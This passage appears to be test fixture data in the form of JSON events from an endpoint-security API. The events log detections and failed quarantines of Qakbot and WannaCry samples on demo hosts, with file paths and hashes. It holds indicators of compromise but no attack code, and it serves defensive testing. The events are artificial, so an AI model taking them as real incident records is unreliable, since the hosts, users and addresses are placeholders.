Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 